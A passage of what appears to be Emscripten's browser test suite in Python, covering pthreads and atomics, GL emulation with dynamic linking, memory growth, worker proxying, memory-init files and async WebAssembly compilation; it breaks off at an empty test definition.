@requires_graphics_hardware
@requires_sync_compilation
def test_dynamic_link_glemu(self):
create_test_file('pre.js', '''
Module.dynamicLibraries = ['side.wasm'];
''')
create_test_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <assert.h>
const char *side();
int main() {
const char *exts = side();
puts(side());
assert(strstr(exts, "GL_EXT_texture_env_combine"));
REPORT_RESULT(1);
return 0;
}
''')
create_test_file('side.cpp', r'''
#include "SDL/SDL.h"
#include "SDL/SDL_opengl.h"
const char *side() {
SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
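# Test that preloading a 30MB data file while the initial heap is only 16MB (with ALLOW_MEMORY_GROWTH=1) forces the heap to grow during startup.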
def test_memory_growth_during_startup(self):
create_test_file('data.dat', 'X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=16384', '--preload-file', 'data.dat'])
# pthreads tests
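# Helper: create a shell page that hides SharedArrayBuffer and Atomics, simulating a browser without shared memory support.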
def prep_no_SAB(self):
create_test_file('html.html', open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the rest of the remaining GCC atomics after the two above tests.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
def test(args):
print(args)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + args)
test([])
test(['-O3'])
test(['-s', 'MODULARIZE_INSTANCE=1'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'] + modularize)
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that threads can rejoin the pool once detached and finished
@requires_threads
def test_std_thread_detach(self):
self.btest(path_from_root('tests', 'pthread', 'test_std_thread_detach.cpp'), expected='0', args=['-std=c++11', '-s', 'USE_PTHREADS=1'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call to sbrk(), and main thread has to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a certain thread exit time handling bug by spawning tons of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test whether that
# kind of scheme will work with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
def run(debug):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'LIBRARY_DEBUG=%d' % debug])
run(debug=True)
run(debug=False)
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@no_wasm_backend('asm.js')
@requires_threads
def test_pthread_separate_asm_pthreads(self):
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'] + modularize)
# Test the operation of the Module.pthreadMainPrefixURL variable
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs('cdn')
create_test_file('main.cpp', self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define "Module.locateFile" string to locate where worker.js will be loaded from.
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('test.worker.js', os.path.join('cdn', 'test.worker.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where worker.js will be loaded from.
create_test_file('shell2.html', open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "test.worker.js") return "cdn/test.worker.js"; else return filename; }, '))
self.compile_btest(['main.cpp', '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('test.worker.js')
self.run_browser('test2.html', '', '/report_result?1')
# Test that when the main thread is performing a futex wait while a pthread needs it to do a proxied operation (before that pthread would wake up the main thread), the two do not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'WASM_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'ASSERTIONS=1'])
# test atomicrmw i64
@no_wasm_backend('uses an asm.js .ll file')
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn calls the signal handler set by signal(SIGALRM, func);
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
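# Generate source data containing every possible pair of byte values and verify that the MEM_INIT_METHOD=2 memory initializer reproduces it intact (checked at runtime by meminit_pairs.c).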
@no_wasm_backend('mem init file')
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
@no_wasm_backend('mem init file')
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
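# Test --separate-asm support: the asm.js code is split into its own file (here both via tools/separate_asm.py and via the --separate-asm flag) and loaded from a separate script tag.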
@no_wasm_backend('asm.js')
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
create_test_file('one.html', '<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
create_test_file('two.html', '''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('tests.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
self.assertExists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
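# Test -s EMTERPRETIFY_FILE: the emterpreter bytecode is emitted into a separate code.dat file, which the custom shell fetches via XHR and passes to the runtime through Module.emterpreterFile.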
@no_wasm_backend('emterpretify')
def test_emterpretify_file(self):
create_test_file('shell.html', '''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
self.assertExists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
@no_wasm_backend('mem init file')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js'] + opts)
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'WASM_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'WASM_ASYNC_COMPILATION=0'], 0), # force it off
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = 'src.cpp'
create_test_file(src, self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
self.compile_btest(['src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), 'manual_wasm_instantiate.html')
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
